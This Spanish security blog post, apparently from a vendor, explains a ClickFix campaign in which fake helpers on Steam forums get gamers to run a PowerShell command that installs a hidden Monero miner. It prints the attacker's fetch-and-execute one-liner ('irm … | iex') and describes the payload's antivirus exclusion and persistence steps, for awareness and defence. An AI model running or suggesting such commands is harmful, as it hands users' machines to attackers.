Malos consejos para los jugadores: ClickFix llega a los foros de Steam

Los foros de Steam son el campo de batalla definitivo para los ataques de ClickFix. Desglosamos cómo los atacantes se disfrazan de comentaristas útiles con el fin de engañar a los jugadores para que instalen un criptominero en sus PC.

ClickFix en los foros de Steam: cómo los comandos maliciosos de PowerShell instalan un criptominero

Este año ha sido testigo de un verdadero auge de los ataques de ClickFix. Tiene tanto éxito entre los delincuentes que apenas terminamos de escribir sobre una variación, es hora de cubrir la siguiente.

Esta vez, los atacantes están apuntando a los jugadores: los periodistas de tecnología detectaron publicaciones que ofrecían consejos maliciosos en los foros de Steam. Aquí detallamos cómo se ven estas publicaciones, qué malware suelen propagar y cómo mantener seguro tu dispositivo.

ClickFix llega a los foros de Steam

Muchos jugadores recurren a sus compañeros en los foros de Steam en busca de ayuda y consejos sobre cuestiones como superar una misión complicada, subir de nivel, conseguir el mejor botín o solucionar un error. Y es precisamente esta confianza en los consejos de la comunidad lo que los atacantes han decidido aprovechar.

El ataque comienza cuando los delincuentes responden a la pregunta de alguien sobre fallos del juego, elementos faltantes del inventario u otros problemas técnicos. Haciéndose pasar por comentaristas útiles, sugieren abrir PowerShell como administrador y ejecutar un comando que supuestamente soluciona el problema que tiene el usuario.

Publicación de un actor malicioso en un foro de Steam

Disfrazando su publicación como un consejo para la resolución de un problema, el actor malicioso sugiere abrir PowerShell como administrador y ejecutar un comando que supuestamente soluciona el problema del usuario. Fuente

Como puedes suponer, ejecutar el comando no soluciona nada, solo abre una nueva caja de Pandora. Esa es la idea detrás de ClickFix: usar la ingeniería social para engañar a las víctimas a fin de que realicen ellas mismas acciones inseguras mientras les dan a los estafadores lo que necesitan para poner en riesgo el dispositivo. Hemos cubierto otros trucos de ClickFix antes (CAPTCHA falsos, errores falsos del navegador y más), los cuales se basan en lograr que la víctima ejecute el comando malicioso por su cuenta. Puedes leer más sobre las diferentes variaciones de los ataques de ClickFix en nuestra publicación anterior.

La astucia de usar ClickFix en los foros de Steam es que el ataque puede afectar no solo al jugador que ha pedido ayuda; muchos otros jugadores que tienen el mismo problema y encuentran la respuesta a través de una búsqueda en Google también pueden caer en la trampa.

Una introducción rápida: lo que realmente hay detrás del comando irm | iex

Antes de adentrarnos en qué consiguen los atacantes que los jugadores instalen de esta manera, debemos cubrir algunos antecedentes técnicos. En primer lugar, las publicaciones en los foros de Steam aconsejan a las posibles víctimas desprevenidas que ejecuten el siguiente comando en PowerShell:
irm msfconfig.icu | iex

Para alguien que no esté íntimamente familiarizado con PowerShell, esta línea puede parecer bastante inocua: se parece a la ejecución de MSConfig, la utilidad de configuración del sistema integrada de Windows, con algunos parámetros adicionales.

Sin embargo, es todo menos inofensivo. Analicemos qué hace realmente cada parte de este comando:

  1. irm es la abreviatura del comando integrado de PowerShell Invoke-RestMethod. Se comunica con la dirección web especificada más adelante en la línea y recupera datos en respuesta.
  2. icu es esa dirección web, no el nombre de algún archivo local como podría parecer a primera vista. Se trata del servidor de los atacantes y responde a la solicitud de irm con un script de PowerShell malicioso.
  3. iex es otro comando integrado de PowerShell, Invoke-Expression. Toma todo lo que irm recibe de esa dirección web y lo ejecuta como código de PowerShell.

Una vez ejecutada, esta línea de código de PowerShell descarga un script del sitio especificado y lo ejecuta de inmediato. Como ha señalado correctamente un usuario de Reddit, puedes averiguar con seguridad qué código se descargaría realmente en tu dispositivo, sin el riesgo de que se ejecute, simplemente si eliminas la segunda parte, iex. Sin esa parte, el comando solo descargará el contenido del script y lo imprimirá en la ventana de PowerShell sin ejecutarlo. Este es el código completo y no oculto que se te solicita que ejecutes en tu dispositivo. A continuación, veamos lo que estos útiles foristas de Steam realmente intentan que los jugadores instalen en sus máquinas.

Un criptominero, no una herramienta de optimización

Los atacantes hicieron su tarea: el script de PowerShell descargado de su servidor hace un trabajo convincente al imitar una utilidad de optimización de Windows. Una vez iniciada, le muestra al usuario una serie de notificaciones que afirman borrar archivos temporales, vaciar la caché de DNS, actualizar controladores, verificar el disco en busca de errores, desactivar aplicaciones de inicio innecesarias, analizar el sistema en busca de malware, reparar la imagen de Windows y verificar la integridad de los archivos del sistema.

Optimización falsa de Windows en curso

El script muestra un flujo de mensajes sobre varias tareas de optimización falsas para que parezca que está haciendo un mantenimiento útil. Fuente

La actividad real, mientras tanto, ocurre entre bastidores. Como primer paso, el script verifica si se está ejecutando con privilegios de administrador. Si es así, crea una carpeta de trabajo oculta en C:\Windows\Background y la añade a la lista de exclusión de Microsoft Defender. A partir de ese momento, cualquier archivo que se coloca en esa carpeta dejará de ser analizado por el antivirus integrado de Windows.

A continuación, el script prepara el sistema para la siguiente etapa del ataque y descarga un ejecutable del servidor de los atacantes, guardándolo en la misma carpeta C:\Windows\Background con un nombre que suena legítimo: system.exe.

El archivo descargado es XMRig, una de las herramientas más populares para minar la criptomoneda Monero. XMRig en sí mismo no es malware; es una herramienta de minería de código abierto legítima. El problema es que los atacantes lo instalan en los equipos de las víctimas sin su conocimiento. Una vez que se está ejecutando, la potencia de cálculo del dispositivo se secuestra para la minería de Monero, y la criptomoneda resultante va directamente a los delincuentes.

Esto hace que las plataformas de los jugadores sean objetivos especialmente atractivos: los PC de juegos modernos incluyen CPU y GPU potentes, exactamente el tipo de hardware que es excelente para la criptominería.

Para asegurarse de que el malware sobreviva a un reinicio, la secuencia de comandos también crea una nueva tarea en el Programador de tareas de Windows: XMRig-{nombre del equipo}. A partir de ese momento, inicia automáticamente el criptominero cada vez que se inicia el sistema.

Cómo proteger tu dispositivo de los criptomineros y otro tipo de malware

Desafortunadamente, muchos jugadores se muestran reacios a instalar software de seguridad o mantenerlo en ejecución en sus dispositivos. El principal culpable es el mito persistente de que “un antivirus ralentiza el juego”. Hemos cubierto investigaciones sobre esto en nuestro blog antes y los resultados no han mostrado un impacto significativo en el rendimiento por ejecutar un antivirus durante los juegos.

Sin embargo, no se puede decir lo mismo de los criptomineros: definitivamente perjudican el rendimiento y desgastan tu hardware más rápido. Entonces, ¿qué puedes hacer para mantener tus cuentas y tu PC para juegos fuera de peligro?

  • Evita ejecutar PowerShell, Terminal u otros scripts de la línea de comandos que las personas extrañas te sugieran que copies y ejecutes, ya sea en foros, chats o comentarios.
  • Antes de pulsar Intro en cualquier comando que no comprendas completamente, busca lo que hace y las posibles consecuencias de ejecutarlo.
  • Utiliza una solución de seguridad fiable con modo de juego que marque a tiempo los intentos de descarga de malware y evite que se ejecuten.
  • No desactives la protección mientras juegas. Usar una solución con un modo de juego exclusivo es el camino a seguir. Los productos de seguridad de Kaspersky activan automáticamente ese modo tan pronto como se inicie un juego y retrasan las actualizaciones de bases de datos antivirus, las notificaciones y los análisis de disco programados hasta que hayas terminado de jugar.

¿Tienes curiosidad por saber de qué otra manera los atacantes apuntan a los jugadores? Echa un vistazo a nuestras otras publicaciones:

Consejos